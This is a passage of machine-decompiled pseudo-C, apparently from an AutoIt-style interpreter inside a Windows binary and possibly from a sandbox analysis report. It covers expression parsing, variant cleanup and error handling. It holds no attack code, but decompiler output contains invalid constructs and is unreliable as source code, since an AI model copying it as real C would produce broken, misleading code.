                                  							if(_t411 == 0xa) {
                                  								_t412 =  *_t563;
                                  								__eflags = _t412;
                                  								if(_t412 != 0) {
                                  									E0044318E(_t412);
                                  								}
                                  							} else {
                                  								__eflags = _t411 - 5;
                                  								if(_t411 == 5) {
                                  									E0040E270(_t563, _t563);
                                  								} else {
                                  									__eflags = _t411 - 0xb;
                                  									if(_t411 == 0xb) {
                                  										_push( *((intOrPtr*)( *_t563 + 4)));
                                  										E004111DC();
                                  										_push( *_t563);
                                  										E004111DC();
                                  										_t575 = _t575 + 8;
                                  									} else {
                                  										__eflags = _t411 - 0xc;
                                  										if(_t411 == 0xc) {
                                  											_t422 =  *_t563;
                                  											__eflags = _t422;
                                  											if(_t422 != 0) {
                                  												E0044B3D9(_t422);
                                  											}
                                  										}
                                  									}
                                  								}
                                  							}
                                  							L29:
                                  							 *(_t563 + 8) = 1;
                                  							 *_t563 = 0;
                                  							_t546 =  *0x4a95f8; // 0x1
                                  							 *(_t563 + 8) = _t546;
                                  							_t413 =  *0x4a95f8; // 0x1
                                  							__eflags = _t413 - 1;
                                  							if(_t413 != 1) {
                                  								_t414 = _t413 - 1;
                                  								__eflags = _t414 - 0xb;
                                  								if(__eflags > 0) {
                                  									goto L31;
                                  								}
                                  								switch( *((intOrPtr*)(_t414 * 4 +  &M0042BCDE))) {
                                  									case 0:
                                  										goto L30;
                                  									case 1:
                                  										 *_t563 =  *0x4a95f0;
                                  										 *((intOrPtr*)(_t563 + 4)) =  *0x4a95f4;
                                  										goto L31;
                                  									case 2:
                                  										__fp0 =  *0x4a95f0;
                                  										 *__esi = __fp0;
                                  										goto L31;
                                  									case 3:
                                  										_push(0x10);
                                  										__eax = E004115D7(__edi, __esi, __eflags);
                                  										__esp = __esp + 4;
                                  										__eflags = __eax;
                                  										if(__eax == 0) {
                                  											__eax = 0;
                                  											 *(__esi + 0xc) = 0;
                                  										} else {
                                  											__ecx =  *0x4a95fc;
                                  											__edx =  *__ecx;
                                  											 *__eax =  *__ecx;
                                  											__edx =  *(__ecx + 4);
                                  											 *(__eax + 4) =  *(__ecx + 4);
                                  											__edx =  *(__ecx + 8);
                                  											 *(__eax + 8) = __edx;
                                  											__ecx =  *(__ecx + 0xc);
                                  											 *(__eax + 0xc) = __ecx;
                                  											 *__ecx = 1 +  *__ecx;
                                  											 *(__esi + 0xc) = __eax;
                                  										}
                                  										goto L31;
                                  									case 4:
                                  										_push(0x214);
                                  										__eax = E004115D7(__edi, __esi, __eflags);
                                  										__esp = __esp + 4;
                                  										__eflags = __eax;
                                  										if(__eax == 0) {
                                  											__eax = 0;
                                  											__eflags = 0;
                                  										} else {
                                  											__esi =  *0x4a95f0;
                                  											__ebx = _v124;
                                  											__ecx = 0x85;
                                  											__edi = __eax;
                                  											__eax = memcpy(__eax, __esi, 0x85 << 2);
                                  											__esi + __ecx = __esi + __ecx + __ecx;
                                  											__ecx = 0;
                                  											__esi = _v128;
                                  											__edi = _a8;
                                  										}
                                  										 *__esi = __eax;
                                  										__eflags =  *(__eax + 4);
                                  										if( *(__eax + 4) != 0) {
                                  											__eax =  *(__eax + 4);
                                  											 *__eax = 1 +  *__eax;
                                  										}
                                  										goto L31;
                                  									case 5:
                                  										__eax =  *0x4a95f0;
                                  										 *__esi = __eax;
                                  										goto L31;
                                  									case 6:
                                  										__ecx =  *0x4a95f0;
                                  										 *__esi =  *0x4a95f0;
                                  										goto L31;
                                  									case 7:
                                  										__eflags =  *0x4a95f0;
                                  										if(__eflags != 0) {
                                  											_push(0x10);
                                  											__eax = E004115D7(__edi, __esi, __eflags);
                                  											__esp = __esp + 4;
                                  											_push(__eax);
                                  											 *__esi = __eax;
                                  											__imp__#8();
                                  											__edx =  *0x4a95f0;
                                  											__eax =  *__esi;
                                  											_push(__edx);
                                  											_push(__eax);
                                  											__imp__#10();
                                  											__eflags = __eax;
                                  											if(__eax < 0) {
                                  												__ecx =  *__esi;
                                  												_push( *__esi);
                                  												__imp__#9();
                                  												__edx =  *__esi;
                                  												_push(__edx);
                                  												__eax = E004111DC();
                                  												__esp = __esp + 4;
                                  												 *__esi = 0;
                                  											}
                                  										}
                                  										goto L31;
                                  									case 8:
                                  										__al =  *0x4a95f0;
                                  										 *__esi = __al;
                                  										goto L31;
                                  									case 9:
                                  										_push(0x18);
                                  										__eax = E004115D7(__edi, __esi, __eflags);
                                  										__esp = __esp + 4;
                                  										__eflags = __eax;
                                  										if(__eax == 0) {
                                  											goto L255;
                                  										}
                                  										__ecx =  *0x4a95f0;
                                  										__eax = E0044B8A3(__eax,  *0x4a95f0);
                                  										 *__esi = __eax;
                                  										goto L31;
                                  									case 0xa:
                                  										_push(8);
                                  										__eax = E004115D7(__edi, __esi, __eflags);
                                  										 *__esi = __eax;
                                  										__edx =  *0x4a95f0;
                                  										__ecx =  *( *0x4a95f0);
                                  										 *__eax =  *( *0x4a95f0);
                                  										__edx =  *__esi;
                                  										__eax =  *( *__esi);
                                  										__esp = __esp + 4;
                                  										__eflags = __eax;
                                  										if(__eflags == 0) {
                                  											_push(1);
                                  											__eax = E004115D7(__edi, __esi, __eflags);
                                  											__ecx =  *__esi;
                                  											 *( *__esi + 4) = __eax;
                                  											__edx =  *__esi;
                                  											__eax =  *(__edx + 4);
                                  											__esp = __esp + 4;
                                  											 *__eax = 0;
                                  										} else {
                                  											_push(__eax);
                                  											__eax = E004115D7(__edi, __esi, __eflags);
                                  											__ecx =  *__esi;
                                  											 *( *__esi + 4) = __eax;
                                  											__eax =  *__esi;
                                  											__edx =  *__eax;
                                  											__ecx =  *0x4a95f0;
                                  											__eax =  *(__eax + 4);
                                  											__esp = __esp + 4;
                                  											__edx =  *( *0x4a95f0 + 4);
                                  											__eax = E00410E60(__eax,  *( *0x4a95f0 + 4),  *( *0x4a95f0 + 4));
                                  										}
                                  										goto L31;
                                  									case 0xb:
                                  										_push(0x14);
                                  										__eax = E004115D7(__edi, __esi, __eflags);
                                  										__esp = __esp + 4;
                                  										__eflags = __eax;
                                  										if(__eax == 0) {
                                  											L255:
                                  											__eax = 0;
                                  											 *__esi = 0;
                                  											goto L31;
                                  										}
                                  										__ecx =  *0x4a95f0;
                                  										__eax = E00470870(__eax,  *0x4a95f0);
                                  										 *__esi = __eax;
                                  										goto L31;
                                  								}
                                  							}
                                  							L30:
                                  							_t547 =  *0x4a95f0; // 0x0
                                  							 *_t563 = _t547;
                                  							goto L31;
                                  						}
                                  					}
                                  					if(_t491 < 0x37 || _t491 >= 0x41) {
                                  						__eflags = _t491 - 5;
                                  						if(_t491 != 5) {
                                  							__eflags = _t491 - 0x51;
                                  							if(_t491 > 0x51) {
                                  								goto L9;
                                  							}
                                  							_t88 = _t491 + 0x40af4c; // 0xec
                                  							switch( *((intOrPtr*)(( *_t88 & 0x000000ff) * 4 +  &M0040AEEC))) {
                                  								case 0:
                                  									__eax =  *__eax;
                                  									__eflags = __eax - 4;
                                  									if(__eax < 4) {
                                  										L129:
                                  										__eflags = __eax - 1;
                                  										if(__eax != 1) {
                                  											__eax = __eax - 2;
                                  											__eflags = __eax - 0x27;
                                  											if(__eflags > 0) {
                                  												goto L9;
                                  											}
                                  											__eax =  *(__eax + 0x42bc86) & 0x000000ff;
                                  											switch( *((intOrPtr*)(__eax * 4 +  &M0042BC6E))) {
                                  												case 0:
                                  													__ecx = 1 + __ecx;
                                  													__ebx = 8;
                                  													 *__edi = __ecx;
                                  													goto L10;
                                  												case 1:
                                  													__ecx = 1 + __ecx;
                                  													__ebx = 0xa;
                                  													 *__edi = __ecx;
                                  													goto L10;
                                  												case 2:
                                  													__edi = 0x4a95f0;
                                  													__esi =  &_v128;
                                  													_v108 = 0x16;
                                  													__eax = E0040BC10(0x4a95f0,  &_v128);
                                  													_v72 = 1;
                                  													__edx = _v72;
                                  													_push(__edx);
                                  													goto L170;
                                  												case 3:
                                  													__edi = 0x4a95f0;
                                  													__esi =  &_v128;
                                  													_v108 = 0x16;
                                  													__eax = E0040BC10(0x4a95f0,  &_v128);
                                  													_v80 = 0;
                                  													__ecx = _v80;
                                  													_push(__ecx);
                                  													L170:
                                  													__eax =  &_v128;
                                  													_push(E0040D0B0( &_v128));
                                  													__eax = E004530C9();
                                  													__edi = _a8;
                                  													 *__edi = 1 +  *__edi;
                                  													__esi = _v136;
                                  													goto L4;
                                  												case 4:
                                  													__esp = __esp - 0x10;
                                  													__edi = L"Default";
                                  													__esi = __esp;
                                  													_v108 = 0x16;
                                  													E00401B10(L"Default", __esp, __eflags) =  &_v28;
                                  													_push( &_v28);
                                  													__eax = E0044B8D4();
                                  													__edi = 0x4a95f0;
                                  													__esi =  &_v148;
                                  													__eax = E0040BC10(0x4a95f0, __esi);
                                  													__ecx =  &_v48;
                                  													__esi = E0040D0B0(__esi);
                                  													__eax = _a8;
                                  													 *_a8 = 1 +  *_a8;
                                  													__ecx =  &_v48;
                                  													__eax = E00402250(__ecx);
                                  													__esi = _v156;
                                  													__edi = _a8;
                                  													goto L4;
                                  												case 5:
                                  													goto L9;
                                  											}
                                  										}
                                  										__ecx = 1 + __ecx;
                                  										__ebx = __eax + 6;
                                  										 *__edi = __ecx;
                                  										goto L10;
                                  									}
                                  									__eflags = __eax - 0x27;
                                  									if(__eax < 0x27) {
                                  										goto L9;
                                  									}
                                  									goto L129;
                                  								case 1:
                                  									__edi = 0x4a95f0;
                                  									__esi =  &_v128;
                                  									_v108 = 0x16;
                                  									__eax = E0040BC10(0x4a95f0,  &_v128);
                                  									__eflags = _v124 - 1;
                                  									if(_v124 != 1) {
                                  										__eflags = _v115;
                                  										if(_v115 == 0) {
                                  											__eax = _v120;
                                  										} else {
                                  											__ecx = _v120;
                                  											__eax =  *(_v120 + 0x10);
                                  										}
                                  									} else {
                                  										__eax = _v128;
                                  									}
                                  									__edx = _a4;
                                  									__ebx = _v112;
                                  									__eax = _a8;
                                  									__eax = E00408CC0(_a8, __ebx, __edx, __fp0, _a8); // executed
                                  									__eflags = __eax;
                                  									if(__eax != 0) {
                                  										goto L285;
                                  									} else {
                                  										__eflags =  *((intOrPtr*)(__ebx + 0xf8)) - 1;
                                  										if( *((intOrPtr*)(__ebx + 0xf8)) == 1) {
                                  											goto L285;
                                  										}
                                  										__esi = _v128;
                                  										__edi = _a8;
                                  										goto L4;
                                  									}
                                  								case 2:
                                  									__edi = 0x4a95f0;
                                  									__esi =  &_v128;
                                  									_v108 = 0x16;
                                  									__eax = E0040BC10(0x4a95f0, __esi);
                                  									__edi = _a8;
                                  									__edx = _a4;
                                  									__ecx =  *__edi;
                                  									__eax =  *((intOrPtr*)(_a4 + 4));
                                  									__eax =  *( *((intOrPtr*)(_a4 + 4)) +  *__edi * 4);
                                  									__ecx =  *(__eax + 4);
                                  									__ebx =  *__eax;
                                  									__eax = __esi;
                                  									_v32 = __ecx;
                                  									__esi = E0040D0B0(__esi);
                                  									__eax = E00408F40(__edi, __esi);
                                  									__edx = _v32;
                                  									 *(__esi + 8) = 2;
                                  									 *__esi = __ebx;
                                  									 *(__esi + 4) = __edx;
                                  									 *__edi = 1 +  *__edi;
                                  									__esi = _v128;
                                  									goto L4;
                                  								case 3:
                                  									__edi = 0x4a95f0;
                                  									__esi =  &_v128;
                                  									_v108 = 0x16;
                                  									__eax = E0040BC10(0x4a95f0, __esi);
                                  									__edi = _a8;
                                  									__ecx = _a4;
                                  									__eax =  *__edi;
                                  									__edx =  *((intOrPtr*)(_a4 + 4));
                                  									__eax =  *( *((intOrPtr*)(_a4 + 4)) +  *__edi * 4);
                                  									__fp0 =  *( *( *((intOrPtr*)(_a4 + 4)) +  *__edi * 4));
                                  									__eax = __esi;
                                  									_v136 =  *( *( *((intOrPtr*)(_a4 + 4)) +  *__edi * 4));
                                  									__esi = E0040D0B0(__esi);
                                  									__eax = E00408F40(__edi, __esi);
                                  									__fp0 = _v136;
                                  									 *__esi = __fp0;
                                  									 *(__esi + 8) = 3;
                                  									 *__edi = 1 +  *__edi;
                                  									__esi = _v128;
                                  									goto L4;
                                  								case 4:
                                  									__edi = 0x4a95f0;
                                  									__esi =  &_v128;
                                  									__eax = E0040BC10(0x4a95f0,  &_v128);
                                  									__esi = _a8;
                                  									__eax =  *__esi;
                                  									__edi = _a4;
                                  									__ecx = __eax + 1;
                                  									 *__esi = __eax + 1;
                                  									__edx =  *(__edi + 4);
                                  									__eax =  *( *(__edi + 4) + __eax * 4);
                                  									__eax =  *__eax;
                                  									__edx =  *__eax;
                                  									__esp = __esp - 0x10;
                                  									 *__esp =  *__eax;
                                  									__edx =  *(__eax + 4);
                                  									_v160 =  *(__eax + 4);
                                  									__edx =  *(__eax + 8);
                                  									_v156 =  *(__eax + 8);
                                  									__eax =  *(__eax + 0xc);
                                  									_v152 = __eax;
                                  									 *__eax = 1 +  *__eax;
                                  									__eax =  &_v128;
                                  									__eax = E0040D0B0( &_v128);
                                  									__ebx = _v112;
                                  									_push(__eax);
                                  									_push(__ebx);
                                  									__eax = E004720DB(__eflags, __fp0);
                                  									__eflags = __eax;
                                  									if(__eax != 0) {
                                  										__eax =  *__esi;
                                  										__ecx =  *(__edi + 4);
                                  										__edx =  *( *(__edi + 4) +  *__esi * 4 - 4);
                                  										 *((short*)( *( *(__edi + 4) +  *__esi * 4 - 4) + 0xa)) = E0045E737(__fp0, __ebx, 0x86,  *((short*)( *( *(__edi + 4) +  *__esi * 4 - 4) + 0xa)));
                                  										L285:
                                  										__ecx =  &_v128;
                                  										_push( &_v128);
                                  										goto L296;
                                  									}
                                  									__esi = _v128;
                                  									__edi = _a8;
                                  									_v108 = 0x16;
                                  									goto L4;
                                  								case 5:
                                  									__edi = 0x4a95f0;
                                  									__esi =  &_v128;
                                  									_v108 = 0x16;
                                  									__eax = E0040BC10(0x4a95f0,  &_v128);
                                  									__eflags = _v124 - 1;
                                  									if(__eflags != 0) {
                                  										__eflags = _v115;
                                  										if(__eflags != 0) {
                                  											__ecx = _v120;
                                  											__eax =  *(_v120 + 0x10);
                                  										} else {
                                  											__eax = _v120;
                                  										}
                                  									} else {
                                  										__eax = _v128;
                                  									}
                                  									__edx = _a4;
                                  									__eax = _v112;
                                  									__eax = _a8;
                                  									__eax = E0040C1F0(_a8, __eflags, __fp0, _v112, _a4, _a8);
                                  									__eflags = __eax;
                                  									if(__eax != 0) {
                                  										__eax =  &_v128;
                                  										_push( &_v128);
                                  										goto L296;
                                  									} else {
                                  										__esi = _v128;
                                  										__edi = _a8;
                                  										goto L4;
                                  									}
                                  								case 6:
                                  									__edi = 0x4a95f0;
                                  									__esi =  &_v128;
                                  									__eax = E0040BC10(0x4a95f0, __esi);
                                  									__edx =  &_v85;
                                  									__esi = E0040D0B0(__esi);
                                  									__esi = _v112;
                                  									__eax = _a4;
                                  									__eax = _a8;
                                  									__eax = E004096A0(_a8, __eflags, __fp0, __esi, _a4, _a8,  &_v85);
                                  									__eflags = __eax;
                                  									if(__eax != 0) {
                                  										goto L295;
                                  									}
                                  									__eflags =  *((intOrPtr*)(__esi + 0xf8)) - 1;
                                  									if( *((intOrPtr*)(__esi + 0xf8)) == 1) {
                                  										goto L295;
                                  									}
                                  									__esi = _v128;
                                  									__edi = _a8;
                                  									_v108 = 0x16;
                                  									goto L4;
                                  								case 7:
                                  									__eflags = __ecx;
                                  									if(__ecx == 0) {
                                  										L177:
                                  										__esi = _v112;
                                  										__edx = __esi + 0x488;
                                  										__eax = E00432416(__edx);
                                  										__eflags = __al;
                                  										if(__al == 0) {
                                  											__eax = _a4;
                                  											__ecx =  *((intOrPtr*)(_a4 + 4));
                                  											 *__edi =  *( *((intOrPtr*)(_a4 + 4)) +  *__edi * 4);
                                  											 *((short*)( *( *((intOrPtr*)(_a4 + 4)) +  *__edi * 4) + 0xa)) = E0045E737(__fp0, __esi, 0xa7,  *((short*)( *( *((intOrPtr*)(_a4 + 4)) +  *__edi * 4) + 0xa)));
                                  											__ecx =  &_v140;
                                  											_push( &_v140);
                                  											goto L296;
                                  										}
                                  										__eax = 0;
                                  										__esp = __esp - 0x10;
                                  										_v68 = 0;
                                  										_v56 = 0;
                                  										__eax = __edx;
                                  										__ebx = __esp;
                                  										_v60 = 1;
                                  										__eax = E0040B960(__edx, __ebx, __ecx, __edi);
                                  										__ecx = _a4;
                                  										__eax =  &_v68;
                                  										_push( &_v68);
                                  										_push(__edi);
                                  										_push(_a4);
                                  										__ecx = __esi;
                                  										__eax = E0047E250(__esi, __eflags, __fp0);
                                  										__eflags = __eax;
                                  										if(__eax != 0) {
                                  											__eax = _a4;
                                  											__ecx =  *((intOrPtr*)(_a4 + 4));
                                  											 *__edi =  *( *((intOrPtr*)(_a4 + 4)) +  *__edi * 4);
                                  											 *((short*)( *( *((intOrPtr*)(_a4 + 4)) +  *__edi * 4) + 0xa)) = E0045E737(__fp0, __esi, 0x6e,  *((short*)( *( *((intOrPtr*)(_a4 + 4)) +  *__edi * 4) + 0xa)));
                                  											__esi =  &_v92;
                                  											goto L294;
                                  										}
                                  										__edi =  &_v80;
                                  										__esi =  &_v140;
                                  										_v120 = 0x16;
                                  										__eax = E0040BC10(__edi,  &_v140);
                                  										__esi = __edi;
                                  										__eax = E00408F40(__edi, __edi);
                                  										__esi = _v140;
                                  										__edi = _a8;
                                  										goto L4;
                                  									}
                                  									__eax =  *(__edx + 8) & 0x0000ffff;
                                  									__eflags = __ax - 0x33;
                                  									if(__ax == 0x33) {
                                  										L175:
                                  										__ebx = _v112;
                                  										__eax = E00451B42(__ebx, 0xa9, 0, L"Variable must be of type \'Object\'.", 1);
                                  										__eflags = __eax;
                                  										if(__eax != 0) {
                                  											__eax = _a4;
                                  											__ecx =  *((intOrPtr*)(_a4 + 4));
                                  											 *__edi =  *( *((intOrPtr*)(_a4 + 4)) +  *__edi * 4);
                                  											 *((short*)( *( *((intOrPtr*)(_a4 + 4)) +  *__edi * 4) + 0xa)) = E0045E737(__fp0, __ebx, 0xa9,  *((short*)( *( *((intOrPtr*)(_a4 + 4)) +  *__edi * 4) + 0xa)));
                                  											__ecx =  &_v140;
                                  											_push( &_v140);
                                  											goto L296;
                                  										}
                                  										 *__edi = 1 +  *__edi;
                                  										goto L4;
                                  									}
                                  									__eflags = __ax - 0x35;
                                  									if(__ax != 0x35) {
                                  										goto L177;
                                  									}
                                  									goto L175;
                                  								case 8:
                                  									__ecx = 1 + __ecx;
                                  									__ebx = 5;
                                  									 *__edi = __ecx;
                                  									goto L10;
                                  								case 9:
                                  									__ecx = 1 + __ecx;
                                  									__ebx = 1;
                                  									 *__edi = __ecx;
                                  									goto L10;
                                  								case 0xa:
                                  									__ebx = 0;
                                  									__ecx = 1 + __ecx;
                                  									 *__edi = __ecx;
                                  									goto L10;
                                  								case 0xb:
                                  									__ecx = 1 + __ecx;
                                  									__ebx = 4;
                                  									 *__edi = __ecx;
                                  									goto L10;
                                  								case 0xc:
                                  									__ecx = 1 + __ecx;
                                  									__ebx = 3;
                                  									 *__edi = __ecx;
                                  									goto L10;
                                  								case 0xd:
                                  									__ecx = 1 + __ecx;
                                  									__ebx = 2;
                                  									 *__edi = __ecx;
                                  									goto L10;
                                  								case 0xe:
                                  									__ecx = 1 + __ecx;
                                  									__ebx = 0x12;
                                  									 *__edi = __ecx;
                                  									goto L10;
                                  								case 0xf:
                                  									__ecx = 1 + __ecx;
                                  									__ebx = 0x13;
                                  									 *__edi = __ecx;
                                  									goto L10;
                                  								case 0x10:
                                  									__eax = _v108;
                                  									__eflags = __eax - 0x16;
                                  									if(__eax != 0x16) {
                                  										__eflags = __eax - 0x13;
                                  										if(__eax == 0x13) {
                                  											goto L89;
                                  										}
                                  										__ebx = 0x11;
                                  										L90:
                                  										__ecx = 1 + __ecx;
                                  										 *__edi = __ecx;
                                  										goto L10;
                                  									}
                                  									L89:
                                  									__ebx = 0xb;
                                  									goto L90;
                                  								case 0x11:
                                  									__eax = _v108;
                                  									__eflags = __eax - 0x16;
                                  									if(__eax == 0x16) {
                                  										L155:
                                  										__ebx = 0xc;
                                  										L156:
                                  										__ecx = 1 + __ecx;
                                  										 *__edi = __ecx;
                                  										goto L10;
                                  									}
                                  									__ebx = 0x10;
                                  									__eflags = __eax - 0x13;
                                  									if(__eax != 0x13) {
                                  										goto L156;
                                  									}
                                  									goto L155;
                                  								case 0x12:
                                  									__ecx = 1 + __ecx;
                                  									__ebx = 0xe;
                                  									 *__edi = __ecx;
                                  									goto L10;
                                  								case 0x13:
                                  									_t490 = 0xd;
                                  									 *_t559 = 1 + _t508;
                                  									goto L10;
                                  								case 0x14:
                                  									__ecx = 1 + __ecx;
                                  									__ebx = 9;
                                  									 *__edi = __ecx;
                                  									goto L10;
                                  								case 0x15:
                                  									__ecx = 1 + __ecx;
                                  									__ebx = 6;
                                  									 *__edi = __ecx;
                                  									goto L10;
                                  								case 0x16:
                                  									__ecx = 1 + __ecx;
                                  									__ebx = 0xf;
                                  									 *__edi = __ecx;
                                  									L10:
                                  									_v136 = _t490;
                                  									_v108 = _t490;
                                  									do {
                                  										_t509 = _v95;
                                  										_t564 = _v100;
                                  										if(_t509 != 0) {
                                  											_t375 = _t564[1];
                                  										} else {
                                  											_t375 = _t564;
                                  										}
                                  										_t378 =  *( *_t375 * 0x15 + _t490 + 0x4918f0) & 0x000000ff;
                                  										if(_t378 != 3) {
                                  											__eflags = _t378 - 6;
                                  											if(_t378 > 6) {
                                  												L71:
                                  												__eflags = _t490 - 7;
                                  												if(_t490 == 7) {
                                  													L134:
                                  													__eflags = _v124;
                                  													if(_v124 == 0) {
                                  														L73:
                                  														_t563 = _v128;
                                  														while(1) {
                                  															L4:
                                  															_t508 =  *_t559;
                                  															if(_t508 == _a16) {
                                  																goto L9;
                                  															}
                                  															goto L5;
                                  														}
                                  														goto L9;
                                  													}
                                  													E0040B960(E0040D0B0( &_v128),  &_v52, _t509, _t559);
                                  													_t465 = E0040CE70( &_v52);
                                  													__eflags = _t465;
                                  													if(_t465 == 0) {
                                  														L276:
                                  														__eflags = _v136 - 7;
                                  														if(_v136 != 7) {
                                  															L138:
                                  															E00408F40(_t559,  &_v52);
                                  															_t563 = _v128;
                                  															goto L4;
                                  														}
                                  														_t566 = 8;
                                  														L278:
                                  														_t468 = E00441DB4(_a4, _t559);
                                  														__eflags = _t468;
                                  														if(_t468 != 0) {
                                  															E0045E737(_t594, _v112, 0x6e, _v92);
                                  															_t567 =  &_v64;
                                  															L294:
                                  															E00408F40(_t559, _t567);
                                  															L295:
                                  															_push( &_v128);
                                  															L296:
                                  															E0044B92D();
                                  															E004107C0( &_v108);
                                  															_t475 = 1;
                                  															L20:
                                  															return _t475;
                                  														}
                                  														_t476 =  &_v128;
                                  														__eflags = _v136 - _t566;
                                  														if(_v136 != _t566) {
                                  															_v76 = 0;
                                  															_push(_v76);
                                  														} else {
                                  															_v84 = 1;
                                  															_push(_v84);
                                  														}
                                  														_push(E0040D0B0(_t476));
                                  														E004530C9();
                                  														E0040BE70( &_v112);
                                  														goto L138;
                                  													}
                                  													_t566 = 8;
                                  													__eflags = _v136 - 8;
                                  													if(_v136 == 8) {
                                  														goto L278;
                                  													}
                                  													__eflags = _t465;
                                  													if(_t465 == 0) {
                                  														goto L276;
                                  													}
                                  													goto L138;
                                  												}
                                  												__eflags = _t490 - 8;
                                  												if(_t490 == 8) {
                                  													goto L134;
                                  												}
                                  												goto L73;
                                  											}
                                  											switch( *((intOrPtr*)(_t378 * 4 +  &M0040AED0))) {
                                  												case 0:
                                  													__eflags = _t509;
                                  													if(__eflags != 0) {
                                  														 *_t564 = _t490;
                                  														_v95 = 0;
                                  													} else {
                                  														_push(8);
                                  														_t480 = E004115D7(_t559, _t564, __eflags);
                                  														_t575 = _t575 + 4;
                                  														__eflags = _t480;
                                  														if(_t480 == 0) {
                                  															_t480 = 0;
                                  														} else {
                                  															 *_t480 = _t490;
                                  														}
                                  														 *(_t480 + 4) = _t564;
                                  														_v100 = _t480;
                                  													}
                                  													_t85 =  &_v104;
                                  													 *_t85 = _v104 + 1;
                                  													__eflags =  *_t85;
                                  													goto L71;
                                  												case 1:
                                  													goto L84;
                                  												case 2:
                                  													while(1) {
                                  														__edx = _v100;
                                  														__eflags = __cl;
                                  														if(__cl == 0) {
                                  															__eax = __edx;
                                  														} else {
                                  															__eax =  *(__edx + 4);
                                  														}
                                  														__eflags =  *__eax - 0x12;
                                  														if( *__eax == 0x12) {
                                  															break;
                                  														}
                                  														__eflags = __cl;
                                  														if(__cl == 0) {
                                  															__eax = __edx;
                                  														} else {
                                  															__eax =  *(__edx + 4);
                                  														}
                                  														__eflags =  *__eax - 0x14;
                                  														if( *__eax == 0x14) {
                                  															goto L290;
                                  														} else {
                                  															__edx =  &_v128;
                                  															__eax =  &_v104;
                                  															__eax = E0040B5F0( &_v104, __fp0,  &_v128);
                                  															__eflags = __eax;
                                  															if(__eax != 0) {
                                  																goto L289;
                                  															} else {
                                  																__cl = _v95;
                                  																continue;
                                  															}
                                  														}
                                  													}
                                  													__esi =  &_v104;
                                  													__eax = E0040BE70(__esi);
                                  													goto L71;
                                  												case 3:
                                  													goto L71;
                                  												case 4:
                                  													__eax = _v92;
                                  													__ecx = _v112;
                                  													__eax = E0045E737(__fp0, _v112, 0x6b, _v92);
                                  													goto L295;
                                  												case 5:
                                  													__eax = _v92;
                                  													__ecx = _v112;
                                  													__eax = E0045E737(__fp0, _v112, 0x6c, _v92);
                                  													goto L295;
                                  												case 6:
                                  													L290:
                                  													__eax = _v92;
                                  													__ecx = _v112;
                                  													__eax = E0045E737(__fp0, _v112, 0x6d, _v92);
                                  													goto L295;
                                  											}
                                  										}
                                  										if(_v124 != 1) {
                                  											break;
                                  										}
                                  										_t483 = _v120;
                                  										if(_t483 != 0) {
                                  											_t570 = _t483;
                                  											do {
                                  												_t561 =  *(_t570 + 0x10);
                                  												E00408F40(_t561, _t570);
                                  												_push(_t570);
                                  												E004111DC();
                                  												_t575 = _t575 + 4;
                                  												_t570 = _t561;
                                  												__eflags = _t561;
                                  											} while (_t561 != 0);
                                  										}
                                  										_t486 = _v100;
                                  										if(_t486 == 0) {
                                  											L19:
                                  											_t475 = 0;
                                  											goto L20;
                                  										} else {
                                  											do {
                                  												_t571 =  *(_t486 + 4);
                                  												_push(_t486);
                                  												E004111DC();
                                  												_t575 = _t575 + 4;
                                  												_t486 = _t571;
                                  											} while (_t571 != 0);
                                  											goto L19;
                                  										}
                                  										L84:
                                  										__ecx =  &_v128;
                                  										__eax =  &_v104;
                                  										__eax = E0040B5F0( &_v104, __fp0,  &_v128);
                                  										__eflags = __eax;
                                  									} while (__eax == 0);
                                  									L289:
                                  									E0045E737(_t594, _v112, 0x6e, _v92);
                                  									goto L295;
                                  								case 0x17:
                                  									goto L9;
                                  							}
                                  						}
                                  						_t499 = _v124;
                                  						_v108 = 0x16;
                                  						__eflags = _t499;
                                  						if(_t499 != 0) {
                                  							__eflags = _v115;
                                  							if(__eflags != 0) {
                                  								E00408E80(_v120, _t508, 0x4a95f0);
                                  								_t499 = _v128;
                                  								_v119 = 0;
                                  							} else {
                                  								_push(0x18);
                                  								_t442 = E004115D7(_t559, _t563, __eflags);
                                  								_t575 = _t575 + 4;
                                  								__eflags = _t442;
                                  								if(_t442 == 0) {
                                  									_t443 = 0;
                                  								} else {
                                  									_v136 = _t442;
                                  									_t503 = _v136;
                                  									E0040B960(0x4a95f0, _t503, _t508, _t559);
                                  									_t443 = _t503;
                                  									_t499 = _v124;
                                  								}
                                  								 *((intOrPtr*)(_t443 + 0x10)) = _v120;
                                  								_v120 = _t443;
                                  							}
                                  							L55:
                                  							_t427 =  *( *(_a4 + 4) +  *_t559 * 4);
                                  							_t501 = _t499 + 1;
                                  							_v124 = _t501;
                                  							__eflags = _t501 - 1;
                                  							if(_t501 != 1) {
                                  								__eflags = _v115;
                                  								if(_v115 != 0) {
                                  									_t502 =  *(_v120 + 0x10);
                                  								} else {
                                  									_t502 = _v120;
                                  								}
                                  							} else {
                                  								_t502 = _t563;
                                  							}
                                  							_t531 =  *_t427;
                                  							_t428 = _t502[3];
                                  							_v136 = _t531;
                                  							__eflags = _t428;
                                  							if(_t428 != 0) {
                                  								E004431AD(_t428);
                                  								_t531 = _v140;
                                  								_t502[3] = 0;
                                  							}
                                  							_t430 = _t502[2];
                                  							__eflags = _t430 - 8;
                                  							if(_t430 == 8) {
                                  								_t551 =  *_t502;
                                  								__eflags = _t551;
                                  								if(_t551 == 0) {
                                  									goto L59;
                                  								}
                                  								__imp__#9(_t551);
                                  								_push( *_t502);
                                  								E004111DC();
                                  								_t531 = _v140;
                                  								_t575 = _t575 + 4;
                                  								goto L63;
                                  							} else {
                                  								L59:
                                  								__eflags = _t430 - 0xa;
                                  								if(_t430 == 0xa) {
                                  									_t431 =  *_t502;
                                  									__eflags = _t431;
                                  									if(_t431 != 0) {
                                  										E0044318E(_t431);
                                  										_t531 = _v140;
                                  									}
                                  								} else {
                                  									__eflags = _t430 - 5;
                                  									if(_t430 == 5) {
                                  										E0040E270(_t502, _t563);
                                  										_t531 = _v136;
                                  									} else {
                                  										__eflags = _t430 - 0xb;
                                  										if(_t430 == 0xb) {
                                  											_push( *((intOrPtr*)( *_t502 + 4)));
                                  											E004111DC();
                                  											_push( *_t502);
                                  											E004111DC();
                                  											_t531 = _v136;
                                  											_t575 = _t575 + 8;
                                  										} else {
                                  											__eflags = _t430 - 0xc;
                                  											if(_t430 == 0xc) {
                                  												_t438 =  *_t502;
                                  												__eflags = _t438;
                                  												if(_t438 != 0) {
                                  													E0044B3D9(_t438);
                                  													_t531 = _v140;
                                  												}
                                  											}
                                  										}
                                  									}
                                  								}
                                  								L63:
                                  								_t502[2] = 1;
                                  								 *_t502 = _t531;
                                  								 *_t559 = 1 +  *_t559;
                                  								continue;
                                  							}
                                  						}
